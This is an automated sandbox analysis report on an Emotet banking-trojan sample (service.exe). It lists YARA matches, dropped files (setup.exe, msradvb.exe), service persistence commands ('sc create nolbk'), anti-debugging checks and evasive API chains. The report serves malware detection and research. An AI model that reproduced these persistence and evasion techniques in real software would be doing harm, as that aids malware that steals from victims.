Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_00446EA910_2_00446EA9
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_00446FBF10_2_00446FBF
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_0045714010_2_00457140
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_004393B610_2_004393B6
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_004354FC10_2_004354FC
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_0044D6DD10_2_0044D6DD
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_0044D8CA10_2_0044D8CA
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_004578CA10_2_004578CA
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_004499CC10_2_004499CC
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 10_2_004359CF
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 10_2_00459A21
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 10_2_00455AF8
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 10_2_00435DA3
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 10_2_00443FC3
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 10_2_001F28C1
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 10_2_001F30E8
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 10_2_001F30E4
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 10_2_006537A5
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 10_2_006537A9
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 10_2_00652F82
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 11_2_00456021
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 11_2_004361AF
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 11_2_0044033D
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 11_2_00432430
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 11_2_00456563
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 11_2_004365CF
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 11_2_0040C62E
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 11_2_0044C6B1
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 11_2_00456BC2
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 11_2_00456E36
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 11_2_00450E91
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 11_2_00440EAF
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 11_2_00446EA9
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 11_2_00446FBF
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 11_2_00457140
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 11_2_004393B6
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 11_2_004354FC
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 11_2_0044D6DD
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 11_2_0044D8CA
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 11_2_004578CA
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 11_2_004499CC
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 11_2_004359CF
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 11_2_00459A21
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 11_2_00455AF8
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 11_2_00435DA3
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 11_2_00443FC3
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 11_2_001F28C1
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 11_2_001F30E8
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 11_2_001F30E4
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: String function: 0040A0A5 appears 58 times
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: String function: 00438CB5 appears 86 times
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: String function: 0043BCF3 appears 46 times
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: String function: 00433D44 appears 194 times
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: String function: 0040BFEA appears 40 times
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: String function: 004042E5 appears 32 times
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: String function: 00432ACF appears 44 times
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: String function: 0040119F appears 34 times
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: String function: 00406F55 appears 120 times
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: String function: 00447FF5 appears 38 times
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: String function: 00432A66 appears 394 times
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: String function: 00406FC8 appears 38 times
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: String function: 00432A99 appears 52 times
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: String function: 0040440F appears 40 times
Source: C:\Windows\Temp\setup.exe; Code function: String function: 0040A0A5 appears 58 times
Source: C:\Windows\Temp\setup.exe; Code function: String function: 00438CB5 appears 86 times
Source: C:\Windows\Temp\setup.exe; Code function: String function: 0043BCF3 appears 46 times
Source: C:\Windows\Temp\setup.exe; Code function: String function: 00433D44 appears 194 times
Source: C:\Windows\Temp\setup.exe; Code function: String function: 0040BFEA appears 40 times
Source: C:\Windows\Temp\setup.exe; Code function: String function: 004042E5 appears 32 times
Source: C:\Windows\Temp\setup.exe; Code function: String function: 00432ACF appears 44 times
Source: C:\Windows\Temp\setup.exe; Code function: String function: 0040119F appears 34 times
Source: C:\Windows\Temp\setup.exe; Code function: String function: 00406F55 appears 120 times
Source: C:\Windows\Temp\setup.exe; Code function: String function: 00447FF5 appears 38 times
Source: C:\Windows\Temp\setup.exe; Code function: String function: 00432A66 appears 394 times
Source: C:\Windows\Temp\setup.exe; Code function: String function: 00406FC8 appears 38 times
Source: C:\Windows\Temp\setup.exe; Code function: String function: 00432A99 appears 52 times
Source: C:\Windows\Temp\setup.exe; Code function: String function: 0040440F appears 40 times
PE file contains strange resources
Source: setup.exe.7.dr; Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: setup.exe.7.dr; Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: setup.exe.7.dr; Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
Source: service.exe, 00000007.00000002.5985481373.0000000000415000.00000008.00020000.sdmp; Binary or memory string: OriginalFilenameWinScraper.exe vs service.exe
Source: service.exe, 00000007.00000002.5986172786.0000000000E50000.00000002.00000001.sdmp; Binary or memory string: OriginalFilenamemswsock.dll.muij% vs service.exe
Source: service.exe; Binary or memory string: OriginalFilenameWinScraper.exe vs service.exe
Yara signature match
Source: 00000009.00000002.4301641382.0000000000651000.00000020.00000001.sdmp, type: MEMORY; Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000009.00000002.4300993909.00000000001F0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 0000000A.00000002.4298966674.0000000000651000.00000020.00000001.sdmp, type: MEMORY; Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000008.00000002.4276006913.0000000000E10000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 0000000B.00000002.5988263486.00000000005E1000.00000020.00000001.sdmp, type: MEMORY; Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 0000000B.00000002.5987644935.00000000001F0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000008.00000002.4276050052.0000000000E21000.00000020.00000001.sdmp, type: MEMORY; Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 0000000A.00000002.4298327167.00000000001F0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Classification label
Source: classification engine; Classification label: mal100.bank.troj.evad.winEXE@16/3@0/2
Contains functionality to create services
Source: C:\Windows\Temp\setup.exe; Code function: OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle,9_2_0065CF58
Contains functionality to enum processes or threads
Source: C:\Windows\Temp\setup.exe; Code function: 8_2_00E21943 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
Contains functionality to instantiate COM classes
Source: C:\Windows\Temp\setup.exe; Code function: 8_2_0041B1B5 __EH_prolog3_catch_GS,VariantClear,SysAllocStringByteLen,CoCreateInstance,CoCreateInstance,CoCreateInstance
Contains functionality to load and extract PE file embedded resources
Source: C:\Windows\Temp\setup.exe; Code function: 8_2_0042C3B2 FindResourceA
Contains functionality to modify services (start/stop/modify)
Source: C:\Users\user\Desktop\service.exe; Code function: 7_2_00371000 StartServiceCtrlDispatcherW
Contains functionality to register a service control handler (likely the sample is a service DLL)
Source: C:\Users\user\Desktop\service.exe; Code function: 7_2_00371000 StartServiceCtrlDispatcherW
Creates mutexes
Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5988:120:WilError_01
Source: C:\Windows\Temp\setup.exe; Mutant created: \BaseNamedObjects\Global\I9B7A4626
Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6060:120:WilError_01
Source: C:\Windows\Temp\setup.exe; Mutant created: \BaseNamedObjects\Global\M9B7A4626
Creates temporary files
Source: C:\Users\user\Desktop\service.exe; File created: C:\Windows\TEMP\setup.exe
PE file has an executable .text section and no other executable section
Source: service.exe; Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Reads ini files
Source: C:\Windows\Temp\setup.exe; File read: C:\$Recycle.Bin\S-1-5-18\desktop.ini
Reads software policies
Source: C:\Windows\SysWOW64\sc.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Sample is known by Antivirus
Source: service.exe; Virustotal: Detection: 64%
Sample requires command line parameters (based on API chain)
Source: C:\Windows\SysWOW64\msradvb.exe; Evasive API call chain: GetCommandLine,DecisionNodes,ExitProcess
Source: C:\Windows\Temp\setup.exe; Evasive API call chain: GetCommandLine,DecisionNodes,ExitProcess
Spawns processes
Source: unknown; Process created: C:\Windows\SysWOW64\cmd.exe cmd /c sc create nolbk binpath= 'C:\Users\user\Desktop\service.exe' >> C:\servicereg.log 2>&1
Source: unknown; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown; Process created: C:\Windows\SysWOW64\sc.exe sc create nolbk binpath= 'C:\Users\user\Desktop\service.exe'
Source: unknown; Process created: C:\Windows\SysWOW64\cmd.exe cmd /c sc start nolbk >> C:\servicestart.log 2>&1
Source: unknown; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown; Process created: C:\Windows\SysWOW64\sc.exe sc start nolbk
Source: unknown; Process created: C:\Users\user\Desktop\service.exe C:\Users\user\Desktop\service.exe
Source: unknown; Process created: C:\Windows\Temp\setup.exe C:\Windows\TEMP\\setup.exe
Source: unknown; Process created: C:\Windows\Temp\setup.exe --d2cb1917
Source: unknown; Process created: C:\Windows\SysWOW64\msradvb.exe C:\Windows\SysWOW64\msradvb.exe
Source: unknown; Process created: C:\Windows\SysWOW64\msradvb.exe --21a8e291
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\sc.exe sc create nolbk binpath= 'C:\Users\user\Desktop\service.exe'
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\sc.exe sc start nolbk
Source: C:\Users\user\Desktop\service.exe; Process created: C:\Windows\Temp\setup.exe C:\Windows\TEMP\\setup.exe
Source: C:\Windows\Temp\setup.exe; Process created: C:\Windows\Temp\setup.exe --d2cb1917
Source: C:\Windows\SysWOW64\msradvb.exe; Process created: C:\Windows\SysWOW64\msradvb.exe --21a8e291
Uses an in-process (OLE) Automation server
Source: C:\Windows\Temp\setup.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
PE file contains a mix of data directories often seen in goodware
Source: service.exe; Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: service.exe; Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: service.exe; Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: service.exe; Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: service.exe; Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: service.exe; Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: service.exe; Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
PE file contains a debug data directory
Source: service.exe; Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
PE file contains a valid data directory to section mapping
Source: service.exe; Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: service.exe; Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: service.exe; Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: service.exe; Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: service.exe; Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

Contains functionality to dynamically determine API calls
Source: C:\Windows\Temp\setup.exe; Code function: 8_2_0044301E __decode_pointer,LoadLibraryA,GetProcAddress,GetLastError,GetLastError,GetLastError,__encode_pointer,InterlockedExchange,FreeLibrary
PE file contains sections with non-standard names
Source: setup.exe.7.dr; Static PE information: section name: .didat
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\service.exe; Code function: 7_2_00371E76 push ecx; ret 7_2_00371E89
Source: C:\Windows\Temp\setup.exe; Code function: 8_2_00432B3E push ecx; ret 8_2_00432B51
Source: C:\Windows\Temp\setup.exe; Code function: 8_2_00433D89 push ecx; ret 8_2_00433D9C
Source: C:\Windows\Temp\setup.exe; Code function: 9_2_00432B3E push ecx; ret 9_2_00432B51
Source: C:\Windows\Temp\setup.exe; Code function: 9_2_00433D89 push ecx; ret 9_2_00433D9C
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 10_2_00432B3E push ecx; ret 10_2_00432B51
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 10_2_00433D89 push ecx; ret 10_2_00433D9C
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 11_2_00432B3E push ecx; ret 11_2_00432B51
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 11_2_00433D89 push ecx; ret 11_2_00433D9C

Persistence and Installation Behavior:

Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Windows\SysWOW64\msradvb.exe; Executable created and started: C:\Windows\SysWOW64\msradvb.exe
Source: C:\Windows\Temp\setup.exe; Executable created and started: C:\Windows\TEMP\setup.exe
Drops PE files
Source: C:\Users\user\Desktop\service.exe; File created: C:\Windows\Temp\setup.exe
Drops PE files to the windows directory (C:\Windows)
Source: C:\Users\user\Desktop\service.exe; File created: C:\Windows\Temp\setup.exe

Boot Survival:

Contains functionality to start windows services
Source: C:\Users\user\Desktop\service.exe; Code function: 7_2_00371000 StartServiceCtrlDispatcherW
Uses sc.exe to modify the status of services
Source: unknown; Process created: C:\Windows\SysWOW64\sc.exe sc create nolbk binpath= 'C:\Users\user\Desktop\service.exe'

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\Temp\setup.exe; File opened: C:\Windows\SysWOW64\msradvb.exe:Zone.Identifier read attributes | delete
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Windows\Temp\setup.exe; Code function: 8_2_004010AA IsIconic
Source: C:\Windows\Temp\setup.exe; Code function: 8_2_0040419E IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon
Source: C:\Windows\Temp\setup.exe; Code function: 8_2_0041E279 __ehhandler$?_Init@?$_Mpunct@_W@std@@IAEXABV_Locinfo@2@@Z,__EH_prolog3,IsIconic,SetForegroundWindow,SendMessageA,PostMessageA
Source: C:\Windows\Temp\setup.exe; Code function: 8_2_00424704 IsWindowVisible,IsIconic
Source: C:\Windows\Temp\setup.exe; Code function: 8_2_0040726D IsIconic,GetWindowPlacement,GetWindowRect
Source: C:\Windows\Temp\setup.exe; Code function: 9_2_004010AA IsIconic
Source: C:\Windows\Temp\setup.exe; Code function: 9_2_0040419E IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon
Source: C:\Windows\Temp\setup.exe; Code function: 9_2_0041E279 __ehhandler$?_Init@?$_Mpunct@_W@std@@IAEXABV_Locinfo@2@@Z,__EH_prolog3,IsIconic,SetForegroundWindow,SendMessageA,PostMessageA
Source: C:\Windows\Temp\setup.exe; Code function: 9_2_00424704 IsWindowVisible,IsIconic
Source: C:\Windows\Temp\setup.exe; Code function: 9_2_0040726D IsIconic,GetWindowPlacement,GetWindowRect
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 10_2_004010AA IsIconic
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 10_2_0040419E IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 10_2_0041E279 __ehhandler$?_Init@?$_Mpunct@_W@std@@IAEXABV_Locinfo@2@@Z,__EH_prolog3,IsIconic,SetForegroundWindow,SendMessageA,PostMessageA
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 10_2_00424704 IsWindowVisible,IsIconic
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 10_2_0040726D IsIconic,GetWindowPlacement,GetWindowRect
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 11_2_004010AA IsIconic
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 11_2_0040419E IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 11_2_0041E279 __ehhandler$?_Init@?$_Mpunct@_W@std@@IAEXABV_Locinfo@2@@Z,__EH_prolog3,IsIconic,SetForegroundWindow,SendMessageA,PostMessageA
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 11_2_00424704 IsWindowVisible,IsIconic
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 11_2_0040726D IsIconic,GetWindowPlacement,GetWindowRect
Disables application error messages (SetErrorMode)
Source: C:\Users\user\Desktop\service.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\service.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\service.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\service.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\setup.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\setup.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\setup.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\setup.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msradvb.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msradvb.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msradvb.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msradvb.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msradvb.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msradvb.exe; Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Found evasive API chain (may stop execution after checking mutex)
Source: C:\Windows\Temp\setup.exe; Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess
Contains functionality to enumerate running services
Source: C:\Windows\Temp\setup.exe; Code function: EnumServicesStatusExW,GetLastError,EnumServicesStatusExW,GetTickCount,OpenServiceW,QueryServiceConfig2W,GetLastError,QueryServiceConfig2W,CloseServiceHandle,9_2_0065CCBC
Found evasive API chain (may stop execution after checking a module file name)
Source: C:\Windows\SysWOW64\msradvb.exe; Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Source: C:\Windows\Temp\setup.exe; Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Found large amount of non-executed APIs
Source: C:\Windows\Temp\setup.exe; API coverage: 2.2 %
Source: C:\Windows\Temp\setup.exe; API coverage: 3.7 %
Source: C:\Windows\SysWOW64\msradvb.exe; API coverage: 2.1 %
Source: C:\Windows\SysWOW64\msradvb.exe; API coverage: 1.8 %
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
Checks the free space of harddrives
Source: C:\Windows\Temp\setup.exe; File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Temp\setup.exe; File Volume queried: C:\ FullSizeInformation
Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\Desktop\service.exe; Code function: 7_2_0037479C FindFirstFileExA
Source: C:\Windows\Temp\setup.exe; Code function: 8_2_00426C63 lstrlenA,FindFirstFileA,FindClose
Source: C:\Windows\Temp\setup.exe; Code function: 8_2_0041F3E5 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA
Source: C:\Windows\Temp\setup.exe; Code function: 9_2_00426C63 lstrlenA,FindFirstFileA,FindClose
Source: C:\Windows\Temp\setup.exe; Code function: 9_2_0041F3E5 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 10_2_00426C63 lstrlenA,FindFirstFileA,FindClose
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 10_2_0041F3E5 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 11_2_00426C63 lstrlenA,FindFirstFileA,FindClose
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 11_2_0041F3E5 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA
Contains functionality to query system information
Source: C:\Windows\Temp\setup.exe; Code function: 8_2_00432277 VirtualQuery,GetSystemInfo,__invoke_watson,GetModuleHandleA,GetProcAddress,VirtualAlloc,VirtualProtect
Program exit points
Source: C:\Windows\Temp\setup.exe; API call chain: ExitProcess graph end node
Source: C:\Windows\Temp\setup.exe; API call chain: ExitProcess graph end node
Source: C:\Windows\Temp\setup.exe; API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\msradvb.exe; API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\msradvb.exe; API call chain: ExitProcess graph end node
Queries a list of all running processes
Source: C:\Windows\SysWOW64\msradvb.exe; Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\service.exe; Code function: 7_2_00371C60 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Contains functionality to dynamically determine API calls
Source: C:\Windows\Temp\setup.exe; Code function: 8_2_0044301E __decode_pointer,LoadLibraryA,GetProcAddress,GetLastError,GetLastError,GetLastError,__encode_pointer,InterlockedExchange,FreeLibrary
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\service.exe; Code function: 7_2_003733C2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Temp\setup.exe; Code function: 8_2_004010D2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Temp\setup.exe; Code function: 8_2_00E10467 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Temp\setup.exe; Code function: 8_2_00E10C0C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Temp\setup.exe; Code function: 8_2_00E11743 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Temp\setup.exe; Code function: 8_2_00E212CD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Temp\setup.exe; Code function: 8_2_00E21E04 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Temp\setup.exe; Code function: 9_2_004010D2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Temp\setup.exe; Code function: 9_2_001F0467 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Temp\setup.exe; Code function: 9_2_001F0C0C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Temp\setup.exe; Code function: 9_2_001F1743 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Temp\setup.exe; Code function: 9_2_006512CD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Temp\setup.exe; Code function: 9_2_00651E04 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 10_2_004010D2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 10_2_001F0467 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 10_2_001F0C0C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 10_2_001F1743 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 10_2_006512CD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 10_2_00651E04 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 11_2_004010D2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 11_2_001F0467 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 11_2_001F0C0C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 11_2_001F1743 mov eax, dword ptr fs:[00000030h]
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\service.exe; Code function: 7_2_00376956 GetProcessHeap
Contains functionality to register its own exception handler
Source: C:\Users\user\Desktop\service.exe; Code function: 7_2_00371D7B SetUnhandledExceptionFilter
Source: C:\Users\user\Desktop\service.exe; Code function: 7_2_00371C60 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\service.exe; Code function: 7_2_0037435B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\service.exe; Code function: 7_2_003717BE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Windows\Temp\setup.exe; Code function: 8_2_0043D4B8 SetUnhandledExceptionFilter,__encode_pointer
Source: C:\Windows\Temp\setup.exe; Code function: 8_2_0043A174 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Windows\Temp\setup.exe; Code function: 8_2_0044288C __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Windows\Temp\setup.exe; Code function: 8_2_00432A57 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Windows\Temp\setup.exe; Code function: 8_2_0043D4DA __decode_pointer,SetUnhandledExceptionFilter
Source: C:\Windows\Temp\setup.exe; Code function: 9_2_0043D4B8 SetUnhandledExceptionFilter,__encode_pointer
Source: C:\Windows\Temp\setup.exe; Code function: 9_2_0043A174 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Windows\Temp\setup.exe; Code function: 9_2_0044288C __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Windows\Temp\setup.exe; Code function: 9_2_00432A57 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Windows\Temp\setup.exe; Code function: 9_2_0043D4DA __decode_pointer,SetUnhandledExceptionFilter
